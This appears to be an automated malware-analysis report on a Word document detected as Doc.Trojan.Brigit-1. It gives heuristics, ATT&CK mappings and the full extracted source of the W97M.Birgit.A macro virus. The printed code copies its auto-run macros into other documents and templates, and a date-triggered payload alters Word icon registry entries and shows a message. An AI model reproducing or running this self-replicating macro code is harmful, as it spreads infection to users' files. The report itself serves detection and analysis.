MALICIOUS
136
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This document contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of macro-based malware. The script attempts to copy itself to other documents and modifies registry keys related to Word icons, likely to establish persistence or spread. The ClamAV detection name 'Doc.Trojan.Brigit-1' further supports the classification as malware.
Heuristics 5
-
ClamAV: Doc.Trojan.Brigit-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Brigit-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
uCkAc$ = "AutoClose"
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1930 bytes |
SHA-256: 0835341f5f1ef57872165f56a38da4b07615c7ecd11112532f1fee0402f9a618 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
'****************************************
'* ULTRAS CONSTRUCTION KIT FOR WORD 7.0 *
'* Version 1.0 *
'****************************************
'Name Macro Virus: "W97M.Birgit.A"
'************************************************************
'* AutoOpen macro *
'************************************************************
Sub AutoOpen()
On Error Resume Next
uCkAo$ = filename$() + ":AutoOpen"
uCkAc$ = "AutoClose"
uCkAx$ = "AutoExec"
uCkAn$ = "AutoNew"
uCkAe$ = "AutoExit"
uCkTm$ = "ToolsMacro"
uCkFt$ = "FileTemplates"
uCkTc$ = "ToolsCustomize"
MacroCopy uCkAc$, uCkAo$
MacroCopy uCkAx$, uCkAo$
MacroCopy uCkAn$, uCkAo$
MacroCopy uCkAe$, uCkAo$
MacroCopy uCkTm$, uCkAo$
MacroCopy uCkFt$, uCkAo$
MacroCopy uCkTc$, uCkAo$
FileSaveAs .Format = 1
MacroCopy uCkAc$, uCkAo$
MacroCopy uCkAx$, uCkAo$
MacroCopy uCkAn$, uCkAo$
MacroCopy uCkAe$, uCkAo$
MacroCopy uCkTm$, uCkAo$
MacroCopy uCkFt$, uCkAo$
MacroCopy uCkTc$, uCkAo$
FileSave
Payload
End Sub
Sub Payload()
U = Int(Rnd() * 30) + 1
If Day(Now()) = U Then
SetPrivateProfileString "HKEY_CLASSES_ROOT\WORD.DOCUMENT.6\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,31", ""
SetPrivateProfileString "HKEY_CLASSES_ROOT\Word.Template\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,32", ""
AppHide ("Program Manager")
FileSummaryInfo Author:= = "Doctor Rave"
FileSummaryInfo Subject:="Virus"
FileSummaryInfo Title:="W97M.Birgit.A"
FileSummaryInfo Keywords:=""
FileSummaryInfo Comments:="Infected"
MsgBox ("This Virus is dedicated to Birgit R*B*T*C*E*"), ("W97M.Birgit.A")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.